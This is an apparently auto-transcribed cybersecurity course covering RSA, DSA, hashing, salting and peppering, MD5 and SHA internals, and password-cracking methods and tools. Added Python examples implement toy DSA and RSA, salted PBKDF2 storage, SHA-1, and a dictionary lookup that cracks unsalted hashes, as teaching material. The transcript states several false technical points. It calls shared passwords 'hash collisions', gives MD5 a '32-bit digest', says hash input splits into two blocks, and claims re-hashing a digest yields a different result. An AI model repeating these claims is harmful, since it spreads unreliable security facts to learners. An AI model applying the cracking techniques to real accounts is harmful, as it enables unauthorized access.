If somebody receives this ciphertext, they can calculate the plain text using the formula M = C^d mod n, which gives us the value of 10, as selected as our plain text. We can now look at the factors that make the RSA algorithm stand out versus its competitors, and at the advantages, which are the topic of this lesson. RSA encryption depends on using the receiver's public key, so that you don't have to share any secret key to receive messages from others. This was the most glaring flaw faced by symmetric algorithms, which was eventually fixed by the asymmetric cryptography structure. Since the key pairs are related to each other, an interceptor cannot read the message, since they do not have the correct private key to decrypt the information. If a public key can decrypt the information, the sender cannot deny having signed it with his private key without admitting that the private key is not in fact private anymore. The encryption process is faster than that of the DSA algorithm, even if key generation is slower in RSA; many systems across the world tend to reuse the same keys so that they can spend less time on key generation and more time on actual ciphertext management. Data will be tamper-proof in transit, since meddling with the data will alter the usage of the keys: the private key won't be able to decrypt the information, hence alerting the receiver to any kind of manipulation in between. The receiver must be aware of any third party who possesses the private key, since they can alter the data mid-transit, though the cases of this are rather rare. Imagine creating an account on a new website. You provide your email address and set a password that you are confident you would not forget. What about the website owner? How securely are they going to store your password? Website administrators have three alternatives: they can store the passwords in plain text format, they can encrypt the passwords using an encryption and decryption key, or they can store the passwords as a hash value.
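The three DSA phases described above (parameter and key generation, signing, verification) and the RSA worked example (P = 7, Q = 13, e = 5, d = 29, M = 10, C = 82) written out in Python, as an added example that is not part of the original course material. The DSA domain parameters p = 23, q = 11, g = 4 are toy values chosen for illustration (g = 2^((p-1)/q) mod p, so g has order q); the message digest is SHA-256 reduced mod q, and all function names are my own. With a q this small a random (r, s) pair would pass verification with probability about 1/q, which is exactly why the standard uses a 160-bit or larger q.

```python
import hashlib
import secrets

# ---- DSA (toy domain parameters, constructed for illustration) ----
# q prime, p prime with (p - 1) mod q == 0, g != 1 with g^q mod p == 1.
P, Q, G = 23, 11, 4
assert (P - 1) % Q == 0 and pow(G, Q, P) == 1 and G != 1


def hash_to_int(message: bytes, modulus: int) -> int:
    """Digest of the message, reduced into the range used by the formulas."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % modulus


def dsa_keygen(p=P, q=Q, g=G):
    """Private key x in (0, q); public key y = g^x mod p.
    Private bundle is (p, q, g, x), public bundle is (p, q, g, y)."""
    x = secrets.randbelow(q - 1) + 1
    y = pow(g, x, p)
    return (p, q, g, x), (p, q, g, y)


def dsa_sign(message: bytes, private_key):
    p, q, g, x = private_key
    h = hash_to_int(message, q)
    while True:
        k = secrets.randbelow(q - 1) + 1        # fresh random k in (0, q) per signature
        r = pow(g, k, p) % q                    # r = (g^k mod p) mod q
        s = (pow(k, -1, q) * (h + x * r)) % q   # s = k^-1 * (H(m) + x*r) mod q
        if r != 0 and s != 0:                   # degenerate values: redraw k
            return r, s


def dsa_verify(message: bytes, signature, public_key) -> bool:
    p, q, g, y = public_key
    r, s = signature
    if not (0 < r < q and 0 < s < q):           # reject out-of-range components first
        return False
    h = hash_to_int(message, q)
    w = pow(s, -1, q)
    u1 = (h * w) % q
    u2 = (r * w) % q
    v = (pow(g, u1, p) * pow(y, u2, p) % p) % q  # verification component
    return v == r


# ---- RSA, using the numbers from the worked example ----
def rsa_keygen(p: int, q: int, e: int):
    n = p * q
    z = (p - 1) * (q - 1)
    d = pow(e, -1, z)                           # e * d mod z == 1
    return (n, e), (n, d)                       # public (n, e), private (n, d)


def rsa_encrypt(m: int, public_key) -> int:
    n, e = public_key
    return pow(m, e, n)                         # C = M^e mod n


def rsa_decrypt(c: int, private_key) -> int:
    n, d = private_key
    return pow(c, d, n)                         # M = C^d mod n


def rsa_sign(message: bytes, private_key) -> int:
    n, d = private_key
    return pow(hash_to_int(message, n), d, n)   # digest "encrypted" with the private key


def rsa_verify(message: bytes, signature: int, public_key) -> bool:
    n, e = public_key
    return pow(signature, e, n) == hash_to_int(message, n)
```

`pow(x, -1, m)` for the modular inverse needs Python 3.8 or newer. The RSA signing branch reduces the digest mod n only because n = 91 is a toy modulus; with a real key the digest is padded, not reduced.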
Let's have a look at each of these. When a password is stored in plain text format, it is considered the most unsafe option, since anyone in the company can read your passwords, and a single hack or data server breach will expose all the accounts' credentials without needing any extra effort. To counter this, owners can encrypt the passwords and keep them on the servers as a second alternative, but that would mean they also have to store the decryption key somewhere on their servers. In the event of a data breach or a server hack, both the decryption key and the encrypted passwords will be leaked, thus making it a single point of failure. What if there was an option to store the passwords after scrambling them completely, but with no way to decrypt them? This is where hashing comes into play. Since only the hashed values are stored on the server, no decryption is needed, and with no plain text passwords to protect, your credentials are safe even from the website administrators. Considering all the pros, hashed passwords are the industry standard when it comes to storing credentials nowadays. Before getting too deep into the topic, let's get a brief overview of how hashing works. Hashing is the process of scrambling a piece of information or data beyond recognition. We can achieve this by using hash functions, which are essentially algorithms that perform mathematical operations on the plain text. The value generated after passing the plain text information through the hash function is called the hash value, the digest, or in general just the hash of the original data. While this may sound similar to encryption, the major difference is that hashes are meant to be irreversible: no decryption key can convert a digest back to its original value. However, a few hashing algorithms have been broken due to the increase in computational power of today's new generation of computers and processors. There are newer algorithms that stand the test of time and are still in use in multiple areas, for password storage, identity verification, etc. As we discussed earlier, websites use hashing to store users' passwords. So how do they make use of these hashed passwords? When a user signs up to create a new account, the password is run through the hash function and the resulting hash value is stored on the servers. The next time the user comes to log into the account, the password he enters is passed through the same hash function and compared to the hash stored on the main server. If the newly calculated hash is the same as the one stored on the website server, the password must have been correct, because according to hash function terminology, the same inputs will always produce the same outputs. If the hashes do not match, then the password entered during login is not the same as the password entered during sign-up, hence the login will be denied. This way no plain text passwords get stored, both preventing the owner from snooping on user data and protecting users' privacy in the unfortunate event of a data breach or a hack. Apart from password storage, hashing can also be used to perform integrity checks. When a file is uploaded to the internet, the file's hash value is generated and it is uploaded along with the original information. When a new user downloads the file, he can calculate the digest of the downloaded file using the same hash function. The hash values are then compared; if they match, file integrity has been maintained and there has been no data corruption. Since so much important information is being passed onto hash functions, we need to understand how they work. A hash function is a set of mathematical calculations operated on two blocks of data: the main input is broken down into two blocks of similar size, where the block size depends on the algorithm being used. Hash functions are designed to be one way; they shouldn't be reversible, at least by design. Some algorithms, like the previously mentioned MD5, have been compromised, but most secure algorithms are still being used today, like the SHA family of algorithms. The digest size is also dependent on the respective algorithm being used: MD5 has a digest of 128 bits, while SHA-256 has a digest of 256 bits. This digest must always be the same for the same input, irrespective of how many times the calculations are carried out. This is a very crucial feature, since comparing the hash value is the only way to check if the data is untouched, as the functions are not reversible. There are certain requirements of a hash function that need to be met before it is accepted. While some of them are easy to guess, others are placed in order to preserve security in the long run. The hash function must be quick enough to hash large amounts of data at a relatively fast pace, but it also shouldn't be very fast: running the algorithm on all cylinders makes the function easy to brute force and a security liability. There must be a balance that allows the hash function to handle large amounts of data and yet not make it ridiculously easy to brute force by running through all the possible combinations. The hash function must be dependent on each bit of the input. The input can be text, audio, video or any other file type; if a single character is changed, it doesn't matter how small that change may be, the entire digest must have a distinctly different hash value. This is essential to create unique digests for every password that is being stored. But what if two different users are using the same password? Since the hash function is the same for all users, both digests will be the same. This is called a hash collision. You may think this must be a rare occasion where two users have exactly the same password, but that is not the case; we have techniques like salting that can be used to reduce these hash collisions, as we will discuss later in this video. You would be shocked to see the most used passwords of 2020.
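The sign-up and login flow just described, written out in Python as an added example that is not part of the original course material. It shows the problem the passage ends on (two users with the same password get the same unsalted digest) and the fix the transcript introduces next: a random per-user salt plus a site-wide pepper, with a deliberately slow hash (PBKDF2-HMAC-SHA256) to satisfy the "quick but not too fast" requirement. The pepper value, the record layout, the iteration count and the function names are my own choices; the pepper is prepended to the password and would normally be loaded from configuration rather than written next to the user table.

```python
import hashlib
import hmac
import os

# Site-wide pepper: common to all users, kept out of the password database.
# Constructed value for this example only.
PEPPER = b"constructed-pepper-value-for-this-example"


def plain_hash(password: str) -> str:
    """Unsalted digest: identical passwords always give identical hashes."""
    return hashlib.sha256(password.encode()).hexdigest()


def store_password(password: str, iterations: int = 200_000) -> dict:
    """Sign-up: draw a fresh random salt, run the slow salted hash, and return
    the record that goes into the user table (salt is stored, pepper is not)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", PEPPER + password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": digest.hex()}


def verify_password(password: str, record: dict) -> bool:
    """Login: recompute with the stored salt and iteration count, then compare
    in constant time so a mismatch position does not leak through timing."""
    candidate = hashlib.pbkdf2_hmac(
        "sha256",
        PEPPER + password.encode(),
        bytes.fromhex(record["salt"]),
        record["iterations"],
    )
    return hmac.compare_digest(candidate, bytes.fromhex(record["hash"]))


def same_stored_hash(password: str) -> bool:
    """Two users signing up with the same password: do their records collide?"""
    first, second = store_password(password), store_password(password)
    return first["hash"] == second["hash"]
```

Without the salt, the unsalted `plain_hash` of a shared weak password is identical for every user who picked it, so a leaked table reveals groups of accounts at once; with the salt the records differ, and without the pepper an attacker holding the table still lacks an input to the hash.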
All of these passwords are laughably insecure, and since many people use the same passwords repeatedly on different websites, hash collision risks are more common than one would expect. Let's say the hash functions find two users having the same password; how can they store both the hashes without messing up the original data? This is where salting and peppering come into play. Salting is the process of adding a random keyword to the end of the input before it is passed on to the hash function. This random keyword is unique for each user on the system, and it is called the salt value, or just the salt. So even if two passwords are exactly the same, the salt value will differ, and so will the digests. There is a small problem with this process, though: since the salt is unique for each user, the salts need to be stored in the database along with the passwords, sometimes even in plain text, to speed up the process of continuous verification. If the server is hacked, then the hashes will need to be brute forced, which takes a lot of time, but if the attackers receive the salts as well, the entire process becomes very fast. This is something that peppering aims to solve. Peppering is the process of adding a random string of data to the input before passing it to the hash function, but this time the random string is not unique for each user; it is supposed to be common for all users in the database, and the extra bit added is called the pepper. In this case, the pepper is not stored on the servers; it is mostly hard-coded into the website source code, since it's going to be the same for all credentials. This way, even if the servers get hacked, the attackers will not have the right pepper needed to crack all the passwords. Many websites use a combination of salting and peppering to solve the problem of hash collisions and bolster security. Since brute force takes such a long time, many hackers avoid taking the effort; the returns are mostly not worth it, and the number of possible combinations when using both salting and peppering is humongous. With the consensus aiming towards an educated public on digital privacy, it's no surprise to see an increasing interest in encryption algorithms. We have already covered the major names like the DES and the AES algorithms. The MD5 algorithm was one of the first hashing algorithms to take the global stage, as a successor to MD4. Despite the security vulnerabilities encountered later, MD5 still remains a crucial part of data infrastructure in a multitude of environments. The MD5 hashing algorithm is a one-way cryptographic function that accepts a message of any length as input and returns as output a fixed-length digest value to be used for authenticating the original message. The digest size is always 128 bits, irrespective of the input. The MD5 hash function was originally designed for use as a secure cryptographic hash algorithm to authenticate digital signatures. MD5 has since been deprecated for uses other than as a non-cryptographic checksum to verify data integrity and detect unintentional data corruption. Ronald Rivest, founder of RSA Data Security and Institute Professor at MIT, designed MD5 as an improvement to a prior message digest algorithm, MD4. As already iterated before, the process is straightforward: we pass a plain text message to the MD5 hash function, which in turn performs certain mathematical operations on the clear text to scramble the data. The 128-bit digest received from this is going to be radically different from the plain text. The goal of any message digest function is to produce digests that appear to be random. To be considered cryptographically secure, the hash function should meet two requirements: first, that it is impossible for an attacker to generate a message that matches a specific hash value, and second, that it is impossible for an attacker to create two messages that produce the same hash value. Even a slight change in the plain text should trigger a drastic difference in the two digests. This goes a long way in preventing hash collisions, which take place when two different plain texts have the same digest. To achieve this level of intricacy, there are a number of steps to be followed before we receive the digest. Let us take a look at the detailed procedure of how the MD5 hash algorithm works. The first step is to make the plain text compatible with the hash function. To do this we need to pad the bits in the message: when we receive the input string, we have to make sure the size is 64 bits short of a multiple of 512. When it comes to padding the bits, we must add a one first, followed by zeros to round out the extra characters. This prepares a string to have a length of just 64 bits less than a multiple of 512. From here on out, we can proceed to the next step, where we have to pad the length bits. Initially, in the first step, we padded the message in such a way that the total length of the bits in the message was 64 bits short of a multiple of 512. Now we add the length bits in such a way that the total number of bits in the message is perfectly a multiple of 512; that means 64 bits of length, to be precise, are added to the message. Our final string to be hashed is now a definite multiple of 512.
The next step would be to initialize the message digest buffer. The entire padded plain text is now broken down into 512-bit blocks. There are four buffers, or registers, of 32 bits each, named A, B, C and D. These are the four words that are going to store the values of each of these sub-blocks. For the first iteration, these registers have fixed hexadecimal values, as shown on the screen below. Once these values are initialized, we divide each of the 512-bit blocks into 16 further sub-blocks of 32 bits each. For each of these sub-blocks we run four rounds of operations involving the four buffer variables A, B, C and D. These rounds require other constant values as well, which differ with each round of operation. The constant values are stored in an array of 64 elements: since each 32-bit sub-block is run 4 times, 16 such sub-blocks equals 64 constant values needed for a single block iteration. The sub-blocks can be denoted by the letter M and the constant values by the letter T. Coming to the actual round of operation, we see our four buffers, which already have pre-initialized values for the first iteration. At the very beginning, the values of buffers B, C and D are passed to a non-linear logical function; the formula behind this function changes with the particular round being worked on, as we shall see later in this video. Once the output is calculated, it is added to the raw value stored in buffer A. The output of this addition is added to the particular 32-bit sub-block on which we are running the four operations. The output of this then needs to be added to a constant value taken from the constant array; since we have 64 different elements in the array, we can use a distinct element for each iteration of a particular block. The next step involves a circular shift that increases the complexity of the hash algorithm and is necessary to create a unique digest for each individual input. The output generated is then added to the value stored in buffer B. The final output is now stored in the second buffer, B, of the output register. The individual values of C, D and A are derived from the preceding element before the iteration started, meaning the value of B gets stored in C, the value of C is stored in D, and the value of D in A. Now that we have a full register ready for this sub-block, the values of A, B, C and D are moved on as input to the next sub-block. Once all 16 sub-blocks are completed, the final register value is saved and the next 512-bit block begins. At the end of all these blocks, we get the final digest of the MD5 algorithm. Regarding the non-linear process mentioned in the first step, the formula changes for each round it's being run on. This is done to maintain the computational complexity of the algorithm and to increase the randomness of the procedure. The formula for each of the four rounds uses the same parameters, that is B, C and D, to generate a single output; the formulas being used are shown on the screen right now.

Unlike the latest hash algorithm families, a 32-bit digest is relatively easier to compare when verifying the digests; they don't consume a noticeable amount of disk storage and are comparatively easier to remember and reiterate. When using digests, passwords need not be stored in plain text format, which would make them accessible to hackers and malicious actors. Database security also gets a boost, since the size of all the hash values will be the same. In the event of a hack or a breach, the malicious actors will only receive the hashed values, so there is no way to regenerate the plain text, which would be the user passwords in this case, since the functions are irreversible by design. Hashing has become a compulsion when storing user credentials on the server nowadays. A relatively low memory footprint is necessary when it comes to integrating multiple services into the same framework without a CPU overhead. The digest size is the same and the same steps are run to get the hash value irrespective of the size of the input string. This helps in creating a low requirement for computational power and makes it much easier to run on older hardware, which is pretty common in server farms around the world. We can monitor file corruption by comparing hash values before and after transit; once the hashes match, file integrity checks are valid and we can avoid data corruption. Hash functions will always give the same output for the same input irrespective of the iteration parameters; this also helps in ensuring that the data hasn't been tampered with en route to the receiver of the message.

We use our Wi-Fi every day for work, and we use the internet for entertainment and communication. The dependency on technology is at an all-time high thanks to the radical developments and innovation of these last two decades. A big portion of this belongs to ensuring secure channels of communication and data transmission. The Secure Hash Algorithms are a family of cryptographic hash functions published by the National Institute of Standards and Technology along with the NSA. It was passed as a Federal Information Processing Standard, also known as FIPS. It has four different families of hash functions. SHA-0 is a 160-bit hash function published in 1993, and it was withdrawn later after an undisclosed significant flaw. SHA-1 is also a 160-bit hash function which resembles the earlier MD5 algorithm; this was designed by the NSA to be a part of the Digital Signature Algorithm. SHA-2 is a family of two similar hash functions with different block sizes, known as SHA-256 and SHA-512; they differ in the word size, as SHA-256 uses 32-bit words while SHA-512 uses 64-bit words. SHA-3 is a hash function formerly known as Keccak; it was chosen in 2012 after a public competition among non-NSA designers. It supports the same hash lengths as SHA-2, and its internal structure differs significantly from the rest of the SHA family. As we have already iterated, the process is straightforward: we pass a plain text message to the SHA hash function, which in turn performs certain mathematical operations on the clear text to scramble the data. The 160-bit digest received from this is going to be radically different from the plain text. The goal of any hash function is to produce digests that appear to be random. To be considered cryptographically secure, the hash function should meet two requirements: first, that it is impossible for an attacker to generate a message that matches a specific hash value, and second, that it should be impossible for an attacker to create two messages producing exactly the same hash value. Even a slight change in the plain text should trigger a drastic difference in the two digests. This goes a long way in preventing hash collisions, which take place when two different plain texts have the same digest. The SHA family functions have some characteristics that they need to follow while generating the digest; let's go through a few of them. The length of the clear text should be less than 2^64 bits in the case of SHA-1 and SHA-256. This is essential to keep the plain text compatible with the hash function, and the size needs to be in a comparable area to keep the digest as random as possible. The length of the hash digest should be 256 bits in the SHA-256 algorithm, 512 bits in the SHA-512 algorithm, and so on. Bigger digests usually imply significantly more calculations at the cost of speed and space. We typically go for the longest digest to bolster security, but there must be a definite balance between the speed and security of a hash function. By design, all hash functions of the SHA family, such as SHA-512 and SHA-256, are irreversible: you should neither get the plain text when you have the digest beforehand, nor should the digest provide the original value when you pass it through the same hash function again. Another case of protection is that when the hash digest is passed into the SHA function for a second time, we should get a completely different digest from the first instance; this is done to reduce the chance of brute force attacks. To achieve this level of intricacy, there are a number of steps to be followed before we receive the digest. Let us take a look at the detailed procedure of how the SHA algorithm works. The first step is to make the plain text compatible with the hash function. To do this we need to pad the bits in the message: when you receive the input string, you have to make sure the size is 64 bits short of a multiple of 512. When it comes to padding the message, you must add a one first, followed by the remaining zeros to round out the extra characters. This prepares a string to have a length just 64 bits less than any multiple of 512. From here on out, we can proceed to the next step, where we have to pad the length bits. Initially, in the first step, we padded the message in such a way that the total number of bits in the message was 64 bits short of becoming a multiple of 512. Now we add the length bits in such a way that the total number of bits in the message is a perfect multiple of 512; that means 64 bits plus the length of the original message becomes a multiple of 512.
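The SHA-1 padding just described, followed by the five chaining variables A to E, the W_t expansion and the 80 rounds with their per-stage constants K_t that the transcript covers next, as a complete SHA-1 in Python. This is an added example, not code from the original course, and it goes beyond the padding step so that the result can be checked against the standard library. One detail the transcript does not spell out is that B is rotated left by 30 bits on its way into C; that rotation is part of the FIPS 180 specification. Function names are my own.

```python
import hashlib
import struct

MASK = 0xFFFFFFFF
# One constant K_t for each of the four 20-round stages (FIPS 180 values).
K = [0x5A827999, 0x6ED9EBA1, 0x8F1BBCDC, 0xCA62C1D6]


def rotl(x: int, n: int) -> int:
    """32-bit circular left shift."""
    return ((x << n) | (x >> (32 - n))) & MASK


def sha1_pad(message: bytes) -> bytes:
    """Append a 1 bit, then zeros until the length is 64 bits short of a multiple
    of 512, then the message length in bits as a 64-bit big-endian integer.
    SHA is big-endian throughout, which is the main difference from MD5 padding."""
    padded = message + b"\x80"
    padded += b"\x00" * ((56 - len(padded)) % 64)
    return padded + struct.pack(">Q", 8 * len(message))


def sha1(message: bytes) -> str:
    # Chaining variables A, B, C, D, E with their fixed initial values.
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0]
    data = sha1_pad(message)
    for off in range(0, len(data), 64):                    # one 512-bit block
        # W_0..W_15 are the 16 sub-blocks of 32 bits; W_16..W_79 are derived
        # from earlier words with XOR and a 1-bit rotation.
        w = list(struct.unpack(">16I", data[off:off + 64]))
        for t in range(16, 80):
            w.append(rotl(w[t - 3] ^ w[t - 8] ^ w[t - 14] ^ w[t - 16], 1))
        a, b, c, d, e = h
        for t in range(80):                                # 4 stages x 20 rounds
            stage = t // 20
            if stage == 0:                                 # non-linear process P
                f = (b & c) | (~b & d)
            elif stage == 2:
                f = (b & c) | (b & d) | (c & d)
            else:                                          # stages 1 and 3
                f = b ^ c ^ d
            # temp = S5(A) + P(B,C,D) + E + W_t + K_t, stored back into A;
            # the other registers shift down, with B rotated by 30 bits into C.
            temp = (rotl(a, 5) + f + e + w[t] + K[stage]) & MASK
            a, b, c, d, e = temp, a, rotl(b, 30), c, d
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d, e))]
    return "".join(f"{x:08x}" for x in h)                 # 160-bit digest, 40 hex chars


def matches_stdlib(message: bytes) -> bool:
    """Cross-check against hashlib for any input, including multi-block ones."""
    return sha1(message) == hashlib.sha1(message).hexdigest()
```

Running `sha1(b"abc")` and `sha1(b"abd")` side by side shows the avalanche property the transcript keeps returning to: a one-character change in the input leaves no recognisable relation between the two digests.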
this becomes a final string that needs to be hashed in the next step we have to initialize this chaining variables the entire plain text message can now be broken down into blocks of 512 bits each unlike other hash algorithms like md5 which use four registers or buffers sha family use five buffers of 32 bits each they are named a b c d and e these registers go through multiple rounds of operation where the first iteration has fixed has a decimal values as can be seen in the screen moving on we have to process each of the 512-bit blocks by breaking each of them into 16 sub blocks of 32 bits each of them goes through four rounds of operation that use the entire register and have the 512-bit block along with the constant array out of those four rounds each round has 20 iterations so in general we have 80 round sum total the constant value of K is an array of 80 elements of those 80 16 elements are being used each round so that comes out to 80 rounds for each of the elements the value of T differs by the number of rounds as can be seen in the table below a single formula is necessary to calculate the output of each round and iteration the formula can be a b c d e register is equal to e plus a non-linear process P along with a circular shift of a plus WT plus KT in this formula ABCD is the register value of the chaining variables as we discussed before p is The Logical process which has a different formula for each round S5 is a circular shift by 5 bits and WT is a 32-bit string derived from the existing sub block this can be calculated depending on the iteration at hand in KT signifies a single element of the 80 character element array which changes depending on the particular round at hand for the values of WT the first 16 values are the same as that of the sub blocks so there is no extra calculation needed for the next 64 elements the value of WT can be calculated as shown in the formula here to better understand this let's take a look at how each of this goes in a 
sequential process we have our initial register using the five words of 32 bits each in the first step we put the values of a b c and d to the subsequent register as the output next we use a non-linear process P that changes depending on the round and uses the values of b c and d as input whatever output is generated from the non-linear process it is added with the value of the E register next the value of a is circular shifted by 5 bits and is added with the output generated in the previous step the next step is adding the value of WT and the constant element of KT the current output is then stored in the register a similarly this iteration is repeated every round and for each subblock in the process once all the registers are complete and all the sub blocks are joined together to form the single ciphertext message we will have our hashed output regarding the non-linear process P that uses the values of b c and d as input the formula changes every round to maintain a complexity of the program that can withstand Brute Force attacks depending on the round the values are passed through a logical operation which is then added with the values of WT KT and so on now that we understand how to get our hash digest from the plain text let us learn about the advantages we obtain when using the Sha hash algorithm instead of relying on data in a plain text format digital signatures follow asymmetric encryption methodology to verify the authenticity of a document or a file hash algorithms like sh-256 and the industry standard sha 512 go a long way in ensuring the verification of signatures passwords need not be stored in a plain text format which makes them accessible to hackers and other malicious actors when using digest the database security also gets a boost since the size of all hash values will be the same in the event of a hack or a breach the malicious actor will only receive the hash values with no way to regenerate the plain text in this case the plain text would be 
user credentials since the hash functions are irreversible by design it has become a compulsion when storing passwords on the servers the SSL handshake is a crucial segment of the web browsing sessions and it's done using sha functions it consists of your web browsers and the web servers agreeing on encryption keys and hashing authentication to prepare a secure connection it relies on a combination of symmetric and asymmetric algorithms which ensure the confidentiality of the data transmitted between a web server and a web client like the browsers you can monitor file corruption by comparing hash values before and after Transit once the hashes match file Integrity checks are valid and data corruption is avoided hash functions will always give the same output for the same input irrespective of the iteration parameters it also helps in ensuring that the data hasn't been tampered with on route to the receiver of the message passwords are by far the most common type of user Authentication they are popular because the theory makes perfect sense to individuals and is reasonably simple to implement for Developers on the other hand poorly constructed passwords can pose security flaws a well-designed password-based authentication process does not save the user's actual password this would make it far too simple for a hacker or a malevolent Insider to access all of the system's user accounts in this video you will learn how to crack passwords and simultaneously try to make your passwords as Brute Force resistant as possible let's take a look at the topics to be covered today we start by learning about what is password cracking in general next we take a look at the different techniques of password cracking that hackers use in order to generate user credentials for hacking moving on we take a look at the multiple tools that hackers can use to generate these hashes and the passwords finally we take a look at the steps and the guidelines that users can follow to prevent their 
passwords from being cracked. Let's start by giving a basic idea about password cracking. Password cracking is the process of identifying an unknown password to a computer or a network resource using program code. It can also assist a threat actor in gaining illegal access to resources; malicious actors can engage in various criminal activities with the information obtained through password cracking. The procedure might entail comparing a set of words to guess credentials, or using an algorithm to guess the password repeatedly. Password cracking can be done for several reasons, but the most malicious reason is to gain unauthorized access to a computer without the owner's awareness. This results in cybercrime, such as stealing passwords for the purpose of accessing banking information. Other, non-malicious reasons for password cracking occur when someone has misplaced or forgotten a password. Another example of non-malicious password cracking may take place when a system administrator is conducting tests on password strength as a form of security test; this is done so that a hacker cannot easily access protected systems. The best way that users can protect their passwords from cracking is to ensure that they choose strong passwords. Typically, passwords must contain a combination of mixed-case random letters, digits and symbols. Strong passwords should never be actual words; in addition, strong passwords are at least 8 characters long. In many password-protected applications, users are notified of the strength of the password they have chosen upon entering it; the user can then modify and strengthen the password based on the indications of its strength. Now that we understand the basics of password cracking, let's go through the basic techniques hackers use to retrieve passwords from general victims. Asking the customer for their password is a simple approach to hacking: a phishing email directs the unwary reader to a counterfeit login page linked with whatever service the hacker
wants to access, generally by demanding the user fix some critical security flaw or aid in a database reset. That page then captures their password, which the hacker can subsequently exploit for their own purpose. Social engineering influences the victim into giving up personal information such as bank account numbers or passwords. The strategy is popular among hackers because they realize that humans are the gateway to vital credentials and information. Through social engineering, they employ tried-and-true tactics to exploit and influence age-old human tendencies rather than devising novel means to breach secure and advanced technologies. It has been demonstrated that many firms either lack adequate security or are overly friendly and trusting even when they should not be; they grant access to critical facilities based on a uniform or a sob story. A hacker searches a password dictionary for the correct password in the case of a dictionary attack. Password dictionaries cover many themes and a mixture of topics such as politics, movies and music groups. Users' failure to create strong passwords is why this approach efficiently cracks passwords to this day; simply said, this assault employs the same terms that many individuals use as passwords. A hacker can compare the obtained password hash to the hashes of the password dictionaries to find the correct plaintext password. Once the passwords have been hashed, the hackers attempt to achieve authentication by breaking the password hash. They accomplish this by applying a rainbow table, which is a set of pre-computed hashes of probable password combinations. Hackers can use the rainbow table to crack the hash, resulting in guessing your password. As a result, it retrieves the password hash from the system and eliminates any need to break it; furthermore, it does not necessitate the discovery of the password itself: the breach is accomplished if the hash matches. In a brute force assault, the attacker attempts multiple password combinations until
the correct one is identified. The attacker uses software to automate this process and run through exhaustive password combinations in a substantially shorter length of time. With the growth of hardware and technology in recent years, such programs have been invigorated. It won't be quick if your password is more than a few characters long, but it will eventually reveal your password; brute force assaults can be sped up by throwing more processing resources at them. With so many different techniques coming together to crack passwords, none of them are useful without the right tools. There is a plethora of scripts and snippets of code that can retrieve passwords from either encrypted storage or from the hash digest; let's go through some of these tools. Cain and Abel is a password recovery tool for Microsoft operating systems. It allows easy recovery of various kinds of passwords by sniffing the network and cracking encrypted passwords using dictionary, brute force and cryptanalysis attacks. Recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, etc. are some of the other features of Cain and Abel. The latest version is faster and contains a lot of new features like ARP poison routing, which enables sniffing on switched LANs and man-in-the-middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, while containing filters to capture credentials from a wide range of authentication mechanisms. It also ships routing protocol authentication monitors and route extractors; dictionary and brute force crackers are also present, along with common hashing algorithms and several specific authentications, password hash calculators and other features. John the Ripper is a password cracking application that was first released in 1996 for Unix-based computers. It was created to evaluate password strength, brute force encrypted hashed passwords and break passwords using dictionary attacks. It can use dictionary attacks, rainbow tables and other attacks depending on the target type.
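The dictionary and rainbow-table attacks described above work only because an unsalted hash of a given password is always the same digest. This added Python example (not from the video) builds a small precomputed lookup, shows it succeed against an unsalted SHA-256 digest, and shows it fail once the same password is stored with a per-user random salt and an iterated PBKDF2 hash; the word list and digests are constructed for illustration.

```python
# Added example (not from the video): why the dictionary and rainbow-table
# lookups described above work against unsalted hashes and fail once every
# stored password gets its own random salt and a slow, iterated hash.
# The word list and the "leaked" digest are constructed for illustration.
import hashlib
import hmac
import os

# Constructed stand-in for a cracking word list
WORDLIST = ["password", "computer", "qwerty", "letmein", "Summer2023!"]
ITERATIONS = 10_000   # a real deployment would use a much higher count

def unsalted_hash(pw: str) -> str:
    """Plain SHA-256: the same password always yields the same digest."""
    return hashlib.sha256(pw.encode()).hexdigest()

def build_lookup(words) -> dict:
    """Precompute digest -> plaintext once; the table is reusable against any dump."""
    return {unsalted_hash(w): w for w in words}

def recover_unsalted(stolen_digest: str, table: dict):
    """One dictionary lookup is enough when hashes are unsalted."""
    return table.get(stolen_digest)

def store_salted(pw: str) -> tuple:
    """Defender side: 16 random salt bytes plus an iterated PBKDF2-HMAC-SHA256 digest."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, ITERATIONS)
    return salt, digest

def verify_salted(pw: str, salt: bytes, digest: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)

def recover_salted(digest: bytes, table: dict):
    """The precomputed table cannot match a salted digest, whatever the password."""
    return table.get(digest.hex())

def same_password_same_digest(pw: str) -> tuple:
    """Two users with the same password: identical unsalted digests, distinct salted ones."""
    unsalted_equal = unsalted_hash(pw) == unsalted_hash(pw)
    _, d1 = store_salted(pw)
    _, d2 = store_salted(pw)
    return unsalted_equal, d1 == d2

def demo() -> dict:
    table = build_lookup(WORDLIST)
    leaked = unsalted_hash("qwerty")            # constructed "leaked" unsalted digest
    salt, digest = store_salted("qwerty")       # the same password stored properly
    return {
        "unsalted_recovered": recover_unsalted(leaked, table),   # "qwerty"
        "salted_recovered": recover_salted(digest, table),       # None
        "login_ok": verify_salted("qwerty", salt, digest),       # True
        "wrong_pw_ok": verify_salted("qwerty1", salt, digest),   # False
    }

if __name__ == "__main__":
    print(demo())
    print(same_password_same_digest("letmein"))
```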
RainbowCrack is a password cracking application that uses a time-memory trade-off algorithm to crack password hashes with rainbow tables. Rainbow tables make password cracking easier and faster than traditional brute force attacks. It is like a dictionary containing nearly every possible password and the pre-calculated hashes. Creating this kind of dictionary takes much more time than cracking a single hash, but after that you can use the same dictionary over and over again. This procedure might take a long time; however, once the table is ready, it can break passwords far quicker than brute force methods. With so many tools ready to nab our passwords, there is a certain set of rules users can follow to protect their credentials from being compromised; let's cover some of these guidelines. Longer passwords are required, making the brute force mechanism tougher to implement. Longer passwords and passphrases have been demonstrated to boost security significantly; however, it is still critical to avoid lengthy passwords that have previously been hacked or that feature often in cracking dictionaries. This password policy encourages users to establish passwords that do not contain personal information. As previously said, most users create passwords utilizing personal information such as hobbies, nicknames, pet or family member names, etc. If a hacker has access to personal information about a specific user, for example via social media, they will test password combinations based on that 